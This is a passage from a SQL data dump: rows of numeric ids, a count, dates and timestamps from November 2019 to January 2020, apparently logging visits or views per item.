01:59:54'),(138,1937,1,'2019-11-29','2019-11-29 03:25:43'),(139,1937,1,'2019-11-29','2019-11-29 04:08:07'),(140,1937,1,'2019-11-29','2019-11-29 06:59:02'),(141,1937,1,'2019-11-29','2019-11-29 08:06:43'),(142,1937,1,'2019-11-29','2019-11-29 08:22:03'),(143,1937,1,'2019-11-29','2019-11-29 09:06:59'),(144,1937,1,'2019-11-29','2019-11-29 11:58:25'),(145,1937,1,'2019-11-29','2019-11-29 13:20:03'),(146,1937,1,'2019-11-29','2019-11-29 14:06:00'),(147,1937,1,'2019-11-29','2019-11-29 15:42:59'),(148,1937,1,'2019-11-29','2019-11-29 16:55:36'),(149,1937,1,'2019-11-29','2019-11-29 18:18:33'),(150,1937,1,'2019-11-29','2019-11-29 19:04:43'),(151,1937,1,'2019-11-29','2019-11-29 21:54:02'),(152,1937,1,'2019-11-29','2019-11-29 23:15:30'),(153,1937,1,'2019-11-30','2019-11-30 00:03:48'),(154,1937,1,'2019-11-30','2019-11-30 02:52:53'),(155,1937,1,'2019-11-30','2019-11-30 04:14:30'),(156,1937,1,'2019-11-30','2019-11-30 05:05:47'),(157,1937,1,'2019-11-30','2019-11-30 05:39:49'),(158,1937,1,'2019-11-30','2019-11-30 07:49:11'),(159,1937,1,'2019-11-30','2019-11-30 09:14:19'),(160,1937,1,'2019-11-30','2019-11-30 10:07:17'),(161,1937,1,'2019-11-30','2019-11-30 12:47:20'),(162,1937,1,'2019-11-30','2019-11-30 13:48:38'),(163,1937,1,'2019-11-30','2019-11-30 14:12:19'),(164,1937,1,'2019-11-30','2019-11-30 15:09:18'),(165,1937,1,'2019-11-30','2019-11-30 17:45:38'),(166,1937,1,'2019-11-30','2019-11-30 19:10:51'),(167,1937,1,'2019-11-30','2019-11-30 20:10:49'),(168,1937,1,'2019-12-01','2019-12-01 00:07:44'),(169,1937,1,'2019-12-01','2019-12-01 01:11:49'),(170,1937,1,'2019-12-01','2019-12-01 05:06:40'),(171,1937,1,'2019-12-01','2019-12-01 06:09:58'),(172,1937,1,'2019-12-01','2019-12-01 10:06:03'),(173,1937,1,'2019-12-01','2019-12-01 11:08:55'),(174,1937,1,'2019-12-01','2019-12-01 11:23:05'),(175,1937,1,'2019-12-01','2019-12-01 15:05:03'),(176,1937,1,'2019-12-01','2019-12-01 16:08:45'),(177,1937,1,'2019-12-01','2019-12-01 21:09:49'),(178,1937,1,'2019-12-02','2019-12-02 02:11:06'),(179,1937,1,'2019-12-02','2019-12-02 07:12:27'),(180,1937,1,'2019-12-02','2019-12-02 08:48:09'),(181,1937,1,'2019-12-02','2019-12-02 08:54:38'),(182,1937,1,'2019-12-02','2019-12-02 12:13:38'),(183,1937,1,'2019-12-02','2019-12-02 17:13:37'),(184,1937,1,'2019-12-02','2019-12-02 21:54:07'),(185,80,1,'2019-12-02','2019-12-02 21:54:15'),(186,474,1,'2019-12-02','2019-12-02 21:55:30'),(187,470,1,'2019-12-02','2019-12-02 21:55:50'),(188,471,1,'2019-12-02','2019-12-02 21:56:07'),(189,84,1,'2019-12-02','2019-12-02 21:57:10'),(190,89,1,'2019-12-02','2019-12-02 21:57:54'),(191,1600,1,'2019-12-02','2019-12-02 21:58:48'),(192,89,1,'2019-12-02','2019-12-02 22:00:10'),(193,2457,1,'2019-12-02','2019-12-02 22:00:34'),(194,89,1,'2019-12-02','2019-12-02 22:01:03'),(195,1586,1,'2019-12-02','2019-12-02 22:01:34'),(196,1937,1,'2019-12-02','2019-12-02 22:14:14'),(197,1937,1,'2019-12-03','2019-12-03 03:15:07'),(198,1937,1,'2019-12-03','2019-12-03 08:14:21'),(199,1937,1,'2019-12-03','2019-12-03 10:41:58'),(200,1937,1,'2019-12-03','2019-12-03 11:39:54'),(201,1937,1,'2019-12-03','2019-12-03 12:14:19'),(202,1937,1,'2019-12-03','2019-12-03 13:19:39'),(203,2904,1,'2019-12-03','2019-12-03 15:29:46'),(204,2904,1,'2019-12-03','2019-12-03 15:41:25'),(205,2904,1,'2019-12-03','2019-12-03 15:41:43'),(206,1937,1,'2019-12-03','2019-12-03 16:26:02'),(207,1937,1,'2019-12-03','2019-12-03 16:56:45'),(208,1937,1,'2019-12-03','2019-12-03 17:00:47'),(209,2801,1,'2019-12-03','2019-12-03 17:02:31'),(210,89,1,'2019-12-03','2019-12-03 17:13:46'),(211,1582,1,'2019-12-03','2019-12-03 17:14:38'),(212,2658,1,'2019-12-03','2019-12-03 17:15:24'),(213,87,1,'2019-12-03','2019-12-03 17:19:08'),(214,473,1,'2019-12-03','2019-12-03 17:20:03'),(215,89,1,'2019-12-03','2019-12-03 17:20:23'),(216,1582,1,'2019-12-03','2019-12-03 17:20:30'),(217,1582,1,'2019-12-03','2019-12-03 17:21:19'),(218,2809,1,'2019-12-03','2019-12-03 17:30:23'),(219,2804,1,'2019-12-03','2019-12-03 17:33:13'),(220,2503,1,'2019-12-03','2019-12-03 17:34:09'),(221,87,1,'2019-12-03','2019-12-03 17:36:42'),(222,74,1,'2019-12-03','2019-12-03 17:38:09'),(223,80,1,'2019-12-03','2019-12-03 18:00:33'),(224,1937,1,'2019-12-03','2019-12-03 18:19:48'),(225,1937,1,'2019-12-03','2019-12-03 18:53:27'),(226,2503,1,'2019-12-03','2019-12-03 18:54:02'),(227,2503,1,'2019-12-03','2019-12-03 19:08:52'),(228,1937,1,'2019-12-03','2019-12-03 23:18:05'),(229,1937,1,'2019-12-04','2019-12-04 02:45:37'),(230,1937,1,'2019-12-04','2019-12-04 04:16:38'),(231,2801,1,'2019-12-04','2019-12-04 07:49:17'),(232,2801,1,'2019-12-04','2019-12-04 08:05:35'),(233,2804,1,'2019-12-04','2019-12-04 08:06:29'),(234,68,1,'2019-12-04','2019-12-04 09:00:19'),(235,1937,1,'2019-12-04','2019-12-04 09:15:07'),(236,1937,1,'2019-12-04','2019-12-04 10:35:56'),(237,1937,1,'2019-12-04','2019-12-04 10:40:20'),(238,68,1,'2019-12-04','2019-12-04 10:58:00'),(239,68,1,'2019-12-04','2019-12-04 13:26:06'),(240,89,1,'2019-12-04','2019-12-04 13:32:24'),(241,1582,1,'2019-12-04','2019-12-04 13:32:31'),(242,1582,1,'2019-12-04','2019-12-04 13:43:38'),(243,1582,1,'2019-12-04','2019-12-04 13:44:53'),(244,1937,1,'2019-12-04','2019-12-04 14:14:08'),(245,1937,1,'2019-12-04','2019-12-04 19:14:38'),(246,2904,1,'2019-12-05','2019-12-05 00:04:48'),(247,1937,1,'2019-12-05','2019-12-05 00:14:19'),(248,68,1,'2019-12-05','2019-12-05 00:21:07'),(249,2904,1,'2019-12-05','2019-12-05 00:24:09'),(250,2904,1,'2019-12-05','2019-12-05 00:25:44'),(251,2503,1,'2019-12-05','2019-12-05 02:05:10'),(252,30,1,'2019-12-05','2019-12-05 02:12:32'),(253,2503,1,'2019-12-05','2019-12-05 02:13:57'),(254,30,1,'2019-12-05','2019-12-05 02:14:28'),(255,2503,1,'2019-12-05','2019-12-05 02:15:58'),(256,2503,1,'2019-12-05','2019-12-05 02:16:29'),(257,2503,1,'2019-12-05','2019-12-05 02:16:39'),(258,2503,1,'2019-12-05','2019-12-05 02:17:18'),(259,2503,1,'2019-12-05','2019-12-05 02:20:25'),(260,2904,1,'2019-12-05','2019-12-05 02:20:56'),(261,2503,1,'2019-12-05','2019-12-05 02:22:36'),(262,1937,1,'2019-12-05','2019-12-05 05:14:30'),(263,1937,1,'2019-12-05','2019-12-05 10:06:06'),(264,80,1,'2019-12-05','2019-12-05 10:06:14'),(265,89,1,'2019-12-05','2019-12-05 10:06:55'),(266,84,1,'2019-12-05','2019-12-05 10:10:39'),(267,1870,1,'2019-12-05','2019-12-05 10:10:56'),(268,1937,1,'2019-12-05','2019-12-05 10:15:30'),(269,1937,1,'2019-12-05','2019-12-05 15:15:55'),(270,1937,1,'2019-12-05','2019-12-05 20:16:42'),(271,1937,1,'2019-12-05','2019-12-05 22:58:16'),(272,1937,1,'2019-12-06','2019-12-06 01:17:44'),(273,1937,1,'2019-12-06','2019-12-06 06:18:12'),(274,1937,1,'2019-12-06','2019-12-06 11:16:40'),(275,1937,1,'2019-12-06','2019-12-06 16:15:24'),(276,1937,1,'2019-12-06','2019-12-06 21:14:12'),(277,1937,1,'2019-12-07','2019-12-07 00:09:02'),(278,76,1,'2019-12-07','2019-12-07 00:12:36'),(279,87,1,'2019-12-07','2019-12-07 00:12:59'),(280,80,1,'2019-12-07','2019-12-07 00:13:44'),(281,87,1,'2019-12-07','2019-12-07 00:15:08'),(282,473,1,'2019-12-07','2019-12-07 00:15:17'),(283,1709,1,'2019-12-07','2019-12-07 00:16:07'),(284,1709,1,'2019-12-07','2019-12-07 08:49:10'),(285,1709,1,'2019-12-07','2019-12-07 08:50:48'),(286,1709,1,'2019-12-07','2019-12-07 08:52:50'),(287,2296,1,'2019-12-07','2019-12-07 08:53:06'),(288,1743,1,'2019-12-07','2019-12-07 08:53:30'),(289,1782,1,'2019-12-07','2019-12-07 08:53:58'),(290,80,1,'2019-12-08','2019-12-08 08:06:12'),(291,80,1,'2019-12-08','2019-12-08 08:07:18'),(292,2503,1,'2019-12-08','2019-12-08 08:09:16'),(293,89,1,'2019-12-08','2019-12-08 08:09:47'),(294,1584,1,'2019-12-08','2019-12-08 08:12:29'),(295,89,1,'2019-12-08','2019-12-08 08:13:18'),(296,1544,1,'2019-12-08','2019-12-08 08:13:34'),(297,2457,1,'2019-12-08','2019-12-08 08:14:17'),(298,80,1,'2019-12-08','2019-12-08 08:16:57'),(299,2410,1,'2019-12-08','2019-12-08 08:18:26'),(300,76,1,'2019-12-08','2019-12-08 08:18:34'),(301,72,1,'2019-12-08','2019-12-08 08:21:07'),(302,108,1,'2019-12-08','2019-12-08 08:22:42'),(303,335,1,'2019-12-08','2019-12-08 08:22:53'),(304,2904,1,'2019-12-08','2019-12-08 08:23:39'),(305,84,1,'2019-12-08','2019-12-08 08:23:44'),(306,91,1,'2019-12-08','2019-12-08 08:32:28'),(307,80,1,'2019-12-08','2019-12-08 08:37:43'),(308,89,1,'2019-12-08','2019-12-08 08:43:15'),(309,1594,1,'2019-12-08','2019-12-08 08:43:53'),(310,2751,1,'2019-12-08','2019-12-08 08:48:59'),(311,87,1,'2019-12-09','2019-12-09 09:04:32'),(312,482,1,'2019-12-09','2019-12-09 09:06:26'),(313,477,1,'2019-12-09','2019-12-09 09:07:34'),(314,80,1,'2019-12-09','2019-12-09 11:54:26'),(315,87,1,'2019-12-09','2019-12-09 12:12:12'),(316,477,1,'2019-12-09','2019-12-09 12:12:50'),(317,76,1,'2019-12-09','2019-12-09 12:14:15'),(318,91,1,'2019-12-09','2019-12-09 12:18:56'),(319,80,1,'2019-12-09','2019-12-09 16:33:19'),(320,89,1,'2019-12-10','2019-12-10 00:41:59'),(321,76,1,'2019-12-10','2019-12-10 01:42:13'),(322,72,1,'2019-12-10','2019-12-10 01:45:47'),(323,91,1,'2019-12-10','2019-12-10 01:53:05'),(324,2904,1,'2019-12-10','2019-12-10 15:13:22'),(325,2503,1,'2019-12-10','2019-12-10 15:13:31'),(326,2809,1,'2019-12-10','2019-12-10 15:14:40'),(327,2804,1,'2019-12-10','2019-12-10 15:18:37'),(328,89,1,'2019-12-10','2019-12-10 15:54:19'),(329,2769,1,'2019-12-10','2019-12-10 15:58:58'),(330,91,1,'2019-12-10','2019-12-10 16:00:10'),(331,1695,1,'2019-12-10','2019-12-10 16:03:38'),(332,91,1,'2019-12-10','2019-12-10 16:04:35'),(333,570,1,'2019-12-10','2019-12-10 16:06:23'),(334,80,1,'2019-12-10','2019-12-10 16:10:42'),(335,2395,1,'2019-12-10','2019-12-10 16:11:26'),(336,84,1,'2019-12-10','2019-12-10 16:16:33'),(337,76,1,'2019-12-10','2019-12-10 16:16:48'),(338,108,1,'2019-12-10','2019-12-10 16:17:10'),(339,87,1,'2019-12-10','2019-12-10 22:35:23'),(340,480,1,'2019-12-10','2019-12-10 22:36:26'),(341,87,1,'2019-12-10','2019-12-10 22:37:15'),(342,482,1,'2019-12-10','2019-12-10 22:37:37'),(343,477,1,'2019-12-10','2019-12-10 22:38:02'),(344,477,1,'2019-12-10','2019-12-10 22:38:59'),(345,102,1,'2019-12-10','2019-12-10 23:50:57'),(346,80,1,'2019-12-11','2019-12-11 11:56:50'),(347,2658,1,'2019-12-11','2019-12-11 15:00:13'),(348,2309,1,'2019-12-11','2019-12-11 15:01:37'),(349,2813,1,'2019-12-11','2019-12-11 15:02:08'),(350,2751,1,'2019-12-11','2019-12-11 15:03:48'),(351,2609,1,'2019-12-11','2019-12-11 15:05:40'),(352,2558,1,'2019-12-11','2019-12-11 15:20:23'),(353,2252,1,'2019-12-11','2019-12-11 15:29:23'),(354,2748,1,'2019-12-11','2019-12-11 15:35:16'),(355,2775,1,'2019-12-11','2019-12-11 16:08:40'),(356,2617,1,'2019-12-11','2019-12-11 16:28:15'),(357,2296,1,'2019-12-11','2019-12-11 16:42:44'),(358,2293,1,'2019-12-11','2019-12-11 16:42:59'),(359,87,1,'2019-12-11','2019-12-11 23:06:37'),(360,76,1,'2019-12-11','2019-12-11 23:07:45'),(361,68,1,'2019-12-11','2019-12-11 23:08:18'),(362,68,1,'2019-12-12','2019-12-12 03:01:27'),(363,72,1,'2019-12-12','2019-12-12 12:30:41'),(364,89,1,'2019-12-12','2019-12-12 12:42:53'),(365,1602,1,'2019-12-12','2019-12-12 12:43:08'),(366,2911,1,'2019-12-12','2019-12-12 14:33:21'),(367,2609,1,'2019-12-12','2019-12-12 14:58:27'),(368,80,1,'2019-12-12','2019-12-12 16:15:41'),(369,2751,1,'2019-12-12','2019-12-12 16:41:18'),(370,2248,1,'2019-12-13','2019-12-13 02:46:12'),(371,2297,1,'2019-12-13','2019-12-13 02:51:18'),(372,2309,1,'2019-12-14','2019-12-14 00:27:54'),(373,2309,1,'2019-12-14','2019-12-14 00:27:55'),(374,2309,1,'2019-12-14','2019-12-14 00:27:55'),(375,2309,1,'2019-12-14','2019-12-14 00:28:23'),(376,474,1,'2019-12-14','2019-12-14 10:55:03'),(377,2457,1,'2019-12-14','2019-12-14 15:02:17'),(378,2769,1,'2019-12-14','2019-12-14 15:07:43'),(379,2309,1,'2019-12-14','2019-12-14 17:22:17'),(380,2658,1,'2019-12-14','2019-12-14 19:45:43'),(381,2751,1,'2019-12-14','2019-12-14 19:55:27'),(382,2609,1,'2019-12-14','2019-12-14 20:06:13'),(383,2309,1,'2019-12-15','2019-12-15 03:45:44'),(384,2658,1,'2019-12-15','2019-12-15 06:16:43'),(385,2751,1,'2019-12-15','2019-12-15 06:36:54'),(386,2609,1,'2019-12-15','2019-12-15 07:26:46'),(387,2769,1,'2019-12-15','2019-12-15 11:24:40'),(388,2658,1,'2019-12-15','2019-12-15 15:49:03'),(389,2609,1,'2019-12-15','2019-12-15 19:00:10'),(390,2751,1,'2019-12-15','2019-12-15 20:21:04'),(391,2309,1,'2019-12-16','2019-12-16 00:34:37'),(392,2658,1,'2019-12-16','2019-12-16 01:04:50'),(393,2751,1,'2019-12-16','2019-12-16 06:45:49'),(394,473,1,'2019-12-16','2019-12-16 10:20:25'),(395,89,1,'2019-12-16','2019-12-16 10:21:22'),(396,108,1,'2019-12-16','2019-12-16 10:22:53'),(397,89,1,'2019-12-16','2019-12-16 10:23:04'),(398,2801,1,'2019-12-16','2019-12-16 14:48:42'),(399,2911,1,'2019-12-16','2019-12-16 14:49:01'),(400,2751,1,'2019-12-16','2019-12-16 14:49:21'),(401,89,1,'2019-12-16','2019-12-16 14:50:54'),(402,1582,1,'2019-12-16','2019-12-16 14:51:03'),(403,1582,1,'2019-12-16','2019-12-16 14:51:31'),(404,2769,1,'2019-12-16','2019-12-16 14:51:38'),(405,1612,1,'2019-12-16','2019-12-16 14:51:55'),(406,1614,1,'2019-12-16','2019-12-16 14:52:06'),(407,1586,1,'2019-12-16','2019-12-16 14:52:17'),(408,2658,1,'2019-12-16','2019-12-16 14:52:45'),(409,1709,1,'2019-12-16','2019-12-16 14:54:10'),(410,2904,1,'2019-12-16','2019-12-16 14:55:56'),(411,76,1,'2019-12-16','2019-12-16 14:56:44'),(412,2751,1,'2019-12-16','2019-12-16 16:44:12'),(413,80,1,'2019-12-16','2019-12-16 16:49:37'),(414,2410,1,'2019-12-16','2019-12-16 16:57:14'),(415,2419,1,'2019-12-16','2019-12-16 16:59:12'),(416,2420,1,'2019-12-16','2019-12-16 17:02:26'),(417,2411,1,'2019-12-16','2019-12-16 17:03:52'),(418,2395,1,'2019-12-16','2019-12-16 17:05:27'),(419,80,1,'2019-12-17','2019-12-17 01:53:37'),(420,80,1,'2019-12-17','2019-12-17 06:05:16'),(421,80,1,'2019-12-17','2019-12-17 06:06:13'),(422,91,1,'2019-12-17','2019-12-17 10:58:22'),(423,80,1,'2019-12-17','2019-12-17 14:17:20'),(424,2609,1,'2019-12-17','2019-12-17 15:01:48'),(425,91,1,'2019-12-17','2019-12-17 15:12:40'),(426,2904,1,'2019-12-17','2019-12-17 15:13:32'),(427,2904,1,'2019-12-17','2019-12-17 15:14:19'),(428,89,1,'2019-12-17','2019-12-17 15:18:05'),(429,2457,1,'2019-12-17','2019-12-17 15:19:09'),(430,76,1,'2019-12-17','2019-12-17 15:23:27'),(431,89,1,'2019-12-17','2019-12-17 15:24:36'),(432,2704,1,'2019-12-17','2019-12-17 15:24:55'),(433,2704,1,'2019-12-17','2019-12-17 16:44:39'),(434,87,1,'2019-12-17','2019-12-17 16:49:31'),(435,72,1,'2019-12-17','2019-12-17 17:35:47'),(436,2801,1,'2019-12-17','2019-12-17 17:36:31'),(437,91,1,'2019-12-17','2019-12-17 17:42:18'),(438,89,1,'2019-12-17','2019-12-17 17:43:05'),(439,1699,1,'2019-12-17','2019-12-17 17:43:50'),(440,84,1,'2019-12-18','2019-12-18 03:48:11'),(441,1872,1,'2019-12-18','2019-12-18 03:48:22'),(442,2609,1,'2019-12-18','2019-12-18 03:49:34'),(443,108,1,'2019-12-18','2019-12-18 03:52:12'),(444,89,1,'2019-12-18','2019-12-18 03:54:17'),(445,87,1,'2019-12-18','2019-12-18 03:55:16'),(446,91,1,'2019-12-18','2019-12-18 03:55:42'),(447,68,1,'2019-12-18','2019-12-18 04:32:42'),(448,68,1,'2019-12-18','2019-12-18 04:36:26'),(449,68,1,'2019-12-18','2019-12-18 04:39:14'),(450,2704,1,'2019-12-18','2019-12-18 10:23:06'),(451,89,1,'2019-12-18','2019-12-18 11:11:55'),(452,1588,1,'2019-12-18','2019-12-18 11:14:04'),(453,89,1,'2019-12-18','2019-12-18 11:18:13'),(454,1598,1,'2019-12-18','2019-12-18 11:18:34'),(455,89,1,'2019-12-18','2019-12-18 11:45:36'),(456,87,1,'2019-12-18','2019-12-18 11:46:03'),(457,89,1,'2019-12-18','2019-12-18 11:46:11'),(458,1600,1,'2019-12-18','2019-12-18 11:46:56'),(459,89,1,'2019-12-18','2019-12-18 12:56:24'),(460,1594,1,'2019-12-18','2019-12-18 12:57:14'),(461,91,1,'2019-12-18','2019-12-18 12:58:12'),(462,87,1,'2019-12-18','2019-12-18 14:33:39'),(463,486,1,'2019-12-18','2019-12-18 14:33:58'),(464,477,1,'2019-12-18','2019-12-18 14:36:12'),(465,68,1,'2019-12-18','2019-12-18 14:36:49'),(466,2801,1,'2019-12-18','2019-12-18 14:38:40'),(467,68,1,'2019-12-18','2019-12-18 14:39:36'),(468,76,1,'2019-12-18','2019-12-18 14:39:50'),(469,2904,1,'2019-12-18','2019-12-18 14:46:00'),(470,2704,1,'2019-12-18','2019-12-18 16:32:39'),(471,87,1,'2019-12-18','2019-12-18 17:50:38'),(472,484,1,'2019-12-18','2019-12-18 17:50:53'),(473,484,1,'2019-12-18','2019-12-18 17:51:32'),(474,76,1,'2019-12-18','2019-12-18 17:52:48'),(475,76,1,'2019-12-18','2019-12-18 17:53:31'),(476,68,1,'2019-12-18','2019-12-18 18:24:19'),(477,80,1,'2019-12-18','2019-12-18 18:28:26'),(478,2309,1,'2019-12-18','2019-12-18 19:35:55'),(479,2309,1,'2019-12-18','2019-12-18 19:36:44'),(480,2309,1,'2019-12-18','2019-12-18 19:37:32'),(481,2801,1,'2019-12-18','2019-12-18 23:47:13'),(482,80,1,'2019-12-18','2019-12-18 23:48:00'),(483,2801,1,'2019-12-18','2019-12-18 23:48:45'),(484,80,1,'2019-12-19','2019-12-19 02:28:01'),(485,89,1,'2019-12-19','2019-12-19 06:14:10'),(486,2704,1,'2019-12-19','2019-12-19 09:26:29'),(487,2609,1,'2019-12-19','2019-12-19 09:39:21'),(488,80,1,'2019-12-19','2019-12-19 09:51:23'),(489,2609,1,'2019-12-19','2019-12-19 13:23:43'),(490,80,1,'2019-12-19','2019-12-19 18:37:32'),(491,2309,1,'2019-12-19','2019-12-19 19:33:33'),(492,2309,1,'2019-12-19','2019-12-19 19:33:34'),(493,473,1,'2019-12-19','2019-12-19 21:59:35'),(494,470,1,'2019-12-19','2019-12-19 22:03:59'),(495,72,1,'2019-12-19','2019-12-19 22:07:49'),(496,108,1,'2019-12-19','2019-12-19 22:07:57'),(497,2934,1,'2019-12-19','2019-12-19 22:09:18'),(498,335,1,'2019-12-19','2019-12-19 22:09:37'),(499,2503,1,'2019-12-19','2019-12-19 22:09:49'),(500,335,1,'2019-12-19','2019-12-19 22:11:28'),(501,89,1,'2019-12-19','2019-12-19 22:12:51'),(502,335,1,'2019-12-19','2019-12-19 22:16:24'),(503,80,1,'2019-12-20','2019-12-20 00:48:31'),(504,91,1,'2019-12-20','2019-12-20 04:47:18'),(505,80,1,'2019-12-20','2019-12-20 11:07:54'),(506,80,1,'2019-12-20','2019-12-20 14:30:58'),(507,91,1,'2019-12-20','2019-12-20 14:33:03'),(508,89,1,'2019-12-20','2019-12-20 14:36:01'),(509,1588,1,'2019-12-20','2019-12-20 14:36:28'),(510,72,1,'2019-12-20','2019-12-20 14:38:21'),(511,2503,1,'2019-12-20','2019-12-20 14:39:06'),(512,80,1,'2019-12-20','2019-12-20 16:02:48'),(513,80,1,'2019-12-21','2019-12-21 01:16:46'),(514,80,1,'2019-12-21','2019-12-21 15:34:36'),(515,2751,1,'2019-12-21','2019-12-21 20:21:50'),(516,80,1,'2019-12-22','2019-12-22 03:27:30'),(517,2609,1,'2019-12-22','2019-12-22 06:39:01'),(518,2609,1,'2019-12-22','2019-12-22 06:39:06'),(519,2801,1,'2019-12-22','2019-12-22 11:00:11'),(520,80,1,'2019-12-22','2019-12-22 17:27:34'),(521,2609,1,'2019-12-22','2019-12-22 18:37:36'),(522,2609,1,'2019-12-22','2019-12-22 18:37:39'),(523,2801,1,'2019-12-22','2019-12-22 20:53:57'),(524,2658,1,'2019-12-22','2019-12-22 22:03:37'),(525,2751,1,'2019-12-22','2019-12-22 23:54:08'),(526,108,1,'2019-12-23','2019-12-23 00:44:11'),(527,80,1,'2019-12-23','2019-12-23 02:34:04'),(528,2609,1,'2019-12-23','2019-12-23 06:36:23'),(529,2609,1,'2019-12-23','2019-12-23 06:36:26'),(530,2801,1,'2019-12-23','2019-12-23 07:15:06'),(531,80,1,'2019-12-23','2019-12-23 07:45:17'),(532,2658,1,'2019-12-23','2019-12-23 07:55:15'),(533,2751,1,'2019-12-23','2019-12-23 09:16:19'),(534,89,1,'2019-12-23','2019-12-23 09:23:17'),(535,2801,1,'2019-12-23','2019-12-23 12:17:06'),(536,80,1,'2019-12-23','2019-12-23 12:43:15'),(537,2658,1,'2019-12-23','2019-12-23 18:04:43'),(538,2801,1,'2019-12-23','2019-12-23 18:24:46'),(539,474,1,'2019-12-23','2019-12-23 19:30:45'),(540,473,1,'2019-12-23','2019-12-23 19:32:11'),(541,80,1,'2019-12-23','2019-12-23 20:14:59'),(542,2751,1,'2019-12-23','2019-12-23 20:45:00'),(543,72,1,'2019-12-23','2019-12-23 21:25:25'),(544,2309,1,'2019-12-24','2019-12-24 00:16:39'),(545,108,1,'2019-12-24','2019-12-24 03:24:05'),(546,2490,1,'2019-12-24','2019-12-24 06:51:04'),(547,2934,1,'2019-12-24','2019-12-24 06:52:30'),(548,2557,1,'2019-12-24','2019-12-24 06:52:57'),(549,80,1,'2019-12-24','2019-12-24 07:18:54'),(550,108,1,'2019-12-24','2019-12-24 10:04:50'),(551,2609,1,'2019-12-24','2019-12-24 11:05:43'),(552,2801,1,'2019-12-24','2019-12-24 11:39:41'),(553,108,1,'2019-12-24','2019-12-24 12:09:41'),(554,108,1,'2019-12-24','2019-12-24 12:10:17'),(555,84,1,'2019-12-24','2019-12-24 12:11:34'),(556,1872,1,'2019-12-24','2019-12-24 12:11:51'),(557,84,1,'2019-12-24','2019-12-24 12:18:04'),(558,72,1,'2019-12-24','2019-12-24 12:19:49'),(559,108,1,'2019-12-24','2019-12-24 12:37:18'),(560,2751,1,'2019-12-24','2019-12-24 12:40:09'),(561,72,1,'2019-12-24','2019-12-24 12:40:51'),(562,108,1,'2019-12-24','2019-12-24 12:41:12'),(563,80,1,'2019-12-24','2019-12-24 13:20:17'),(564,108,1,'2019-12-24','2019-12-24 13:26:21'),(565,2658,1,'2019-12-24','2019-12-24 14:50:53'),(566,80,1,'2019-12-24','2019-12-24 18:54:28'),(567,108,1,'2019-12-24','2019-12-24 20:35:40'),(568,80,1,'2019-12-26','2019-12-26 01:21:52'),(569,72,1,'2019-12-26','2019-12-26 02:02:06'),(570,2508,1,'2019-12-26','2019-12-26 03:21:52'),(571,2801,1,'2019-12-26','2019-12-26 06:44:42'),(572,80,1,'2019-12-26','2019-12-26 07:14:13'),(573,80,1,'2019-12-26','2019-12-26 13:17:45'),(574,72,1,'2019-12-26','2019-12-26 13:47:43'),(575,2801,1,'2019-12-26','2019-12-26 15:17:53'),(576,80,1,'2019-12-26','2019-12-26 16:38:47'),(577,72,1,'2019-12-27','2019-12-27 06:49:21'),(578,80,1,'2019-12-27','2019-12-27 11:06:37'),(579,2751,1,'2019-12-27','2019-12-27 11:26:44'),(580,80,1,'2019-12-27','2019-12-27 13:46:50'),(581,2658,1,'2019-12-27','2019-12-27 14:27:00'),(582,72,1,'2019-12-27','2019-12-27 15:57:52'),(583,80,1,'2019-12-27','2019-12-27 21:09:39'),(584,2801,1,'2019-12-28','2019-12-28 00:22:57'),(585,80,1,'2019-12-28','2019-12-28 04:00:37'),(586,2751,1,'2019-12-28','2019-12-28 04:40:47'),(587,2658,1,'2019-12-28','2019-12-28 05:20:55'),(588,2658,1,'2019-12-28','2019-12-28 09:38:44'),(589,80,1,'2019-12-28','2019-12-28 16:21:45'),(590,80,1,'2019-12-29','2019-12-29 03:27:00'),(591,72,1,'2019-12-29','2019-12-29 05:37:59'),(592,80,1,'2019-12-29','2019-12-29 07:39:05'),(593,2751,1,'2019-12-29','2019-12-29 08:50:26'),(594,68,1,'2019-12-29','2019-12-29 11:32:32'),(595,89,1,'2019-12-29','2019-12-29 11:32:40'),(596,1586,1,'2019-12-29','2019-12-29 11:32:48'),(597,2658,1,'2019-12-29','2019-12-29 11:44:12'),(598,80,1,'2019-12-29','2019-12-29 13:34:43'),(599,72,1,'2019-12-29','2019-12-29 16:05:24'),(600,80,1,'2019-12-29','2019-12-29 22:07:24'),(601,72,1,'2019-12-30','2019-12-30 02:40:50'),(602,80,1,'2019-12-30','2019-12-30 07:11:55'),(603,72,1,'2019-12-30','2019-12-30 14:29:33'),(604,72,1,'2019-12-30','2019-12-30 14:51:59'),(605,80,1,'2019-12-30','2019-12-30 18:19:19'),(606,80,1,'2019-12-30','2019-12-30 22:40:16'),(607,2813,1,'2019-12-30','2019-12-30 23:14:58'),(608,72,1,'2019-12-31','2019-12-31 00:10:24'),(609,2658,1,'2019-12-31','2019-12-31 00:50:13'),(610,80,1,'2019-12-31','2019-12-31 03:00:38'),(611,2751,1,'2019-12-31','2019-12-31 04:21:25'),(612,2309,1,'2019-12-31','2019-12-31 06:51:52'),(613,72,1,'2019-12-31','2019-12-31 09:03:16'),(614,2813,1,'2019-12-31','2019-12-31 10:33:19'),(615,2658,1,'2019-12-31','2019-12-31 10:43:41'),(616,108,1,'2019-12-31','2019-12-31 10:59:19'),(617,80,1,'2019-12-31','2019-12-31 12:13:09'),(618,2751,1,'2019-12-31','2019-12-31 14:34:44'),(619,91,1,'2019-12-31','2019-12-31 17:22:17'),(620,72,1,'2019-12-31','2019-12-31 19:26:50'),(621,80,1,'2019-12-31','2019-12-31 22:08:14'),(622,2658,1,'2019-12-31','2019-12-31 23:38:59'),(623,80,1,'2019-12-31','2019-12-31 23:48:59'),(624,108,1,'2020-01-01','2020-01-01 00:49:49'),(625,2813,1,'2020-01-01','2020-01-01 00:59:58'),(626,2751,1,'2020-01-01','2020-01-01 02:10:37'),(627,2309,1,'2020-01-01','2020-01-01 03:31:05'),(628,2609,1,'2020-01-01','2020-01-01 03:40:54'),(629,72,1,'2020-01-01','2020-01-01 04:10:41'),(630,1711,1,'2020-01-01','2020-01-01 04:50:42'),(631,1606,1,'2020-01-01','2020-01-01 05:41:12'),(632,2801,1,'2020-01-01','2020-01-01 06:11:10'),(633,80,1,'2020-01-01','2020-01-01 07:02:42'),(634,2658,1,'2020-01-01','2020-01-01 09:14:29'),(635,2751,1,'2020-01-01','2020-01-01 11:46:17'),(636,80,1,'2020-01-01','2020-01-01 12:05:50'),(637,72,1,'2020-01-01','2020-01-01 13:06:09'),(638,2813,1,'2020-01-01','2020-01-01 13:26:06'),(639,2309,1,'2020-01-01','2020-01-01 14:36:41'),(640,80,1,'2020-01-01','2020-01-01 17:48:08'),(641,2801,1,'2020-01-01','2020-01-01 18:28:28'),(642,76,1,'2020-01-01','2020-01-01 19:46:38'),(643,2751,1,'2020-01-01','2020-01-01 20:59:04'),(644,2658,1,'2020-01-01','2020-01-01 